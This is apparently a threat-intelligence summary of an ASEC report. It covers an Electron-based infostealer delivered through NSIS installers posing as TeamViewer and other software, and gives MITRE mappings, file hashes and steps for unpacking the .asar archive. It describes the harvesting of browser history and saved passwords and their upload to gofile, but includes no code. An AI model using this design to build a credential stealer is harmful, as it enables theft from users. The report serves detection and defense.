Keypoints
- ASEC discovered an Infostealer implemented as an Electron application and distributed via NSIS installers.
- The malware’s malicious logic resides in Node.js scripts packaged inside an .asar file (commonly under appresources), making static detection harder.
- Analysts can unpack the .asar archive (for example with npm asar) to retrieve and inspect the embedded JavaScript code, notably a.js.
- One strain disguises itself as TeamViewer-related software and collects system information, browser history, and saved credentials.
- Collected data is uploaded to the gofile file-sharing service for exfiltration.
- Because the payload leverages legitimate Electron packaging, both users and defenses may fail to recognize the malware; use official vendor sites to obtain software.
MITRE Techniques
- [T1204] User Execution – The malware is distributed in installer format and requires the user to run it; ‘Generally, the NSI script directly executes the malware distributed in the NSIS installer format.’
- [T1059] Command and Scripting Interpreter – Malicious behavior is implemented in Node.js scripts inside the Electron app (a.js), enabling script-based actions on the host; ‘Because Electron interacts with the OS via node.js, the actual malicious behaviors are defined in the node.js script.’
- [T1027] Obfuscated Files or Information – Use of Electron/.asar packaging conceals the malicious code within an application bundle, making detection more difficult; ‘they are difficult to recognize as malware both for detection and for users.’
- [T1082] System Information Discovery – The malware collects system information prior to exfiltration; ‘The uploaded data includes system information…’
- [T1005] Data from Local System – The malware harvests local browser histories and saved IDs/passwords from the victim system for exfiltration; ‘The uploaded data includes… browser histories, and saved ID and password information.’
- [T1537] Transfer Data to Cloud Account – Exfiltration is performed by uploading the harvested data to the gofile file-sharing service; ‘uploads the collected user information on gofile, a file-sharing service.’
Indicators of Compromise
- [File hash] Samples tied to installer filenames – 9926e2782d603061b52d88f83d93e7af (TeamViewer.exe), cfc6e0014b3cc8d4dcaf0d76e2382556 (BetterShaders Setup 1.0.3.exe), b150afa6b3642ea1da1233b76f7b454e (Software.exe)
- [File name] Malicious/disguised installers observed – TeamViewer.exe, BetterShaders Setup 1.0.3.exe
- [Service/Host] Exfiltration destination – gofile (file-sharing service used to receive uploaded data)
A malicious Electron installer places a packaged Electron app on the target with a typical project hierarchy; the executable bootstraps an .asar archive containing the Node.js application code. Analysts can extract the package using standard .asar tools (for example npm asar) to retrieve the embedded JavaScript files—most notably a.js—which contain the core malicious routines.
The Node.js script implements data collection routines that enumerate system information and harvest browser artifacts, including history and stored credentials. In the observed variants, the collected artifacts are aggregated into files and uploaded to an external file-sharing service (gofile) under automated upload routines, enabling off-host data exfiltration. One observed lure impersonated TeamViewer-related software to increase user execution likelihood.
Because the payload is delivered inside an otherwise legitimate-looking Electron application and launched via an NSIS installer, it can evade casual inspection and some detection controls; the recommended analysis flow is to (1) capture and unpack the installer, (2) extract the .asar archive, (3) inspect scripts like a.js for collection and upload functions, and (4) follow network routines to identify exfil endpoints. Prefer installers from official vendor websites to reduce exposure to such trojanized Electron apps.
Read more: https://asec.ahnlab.com/en/64445/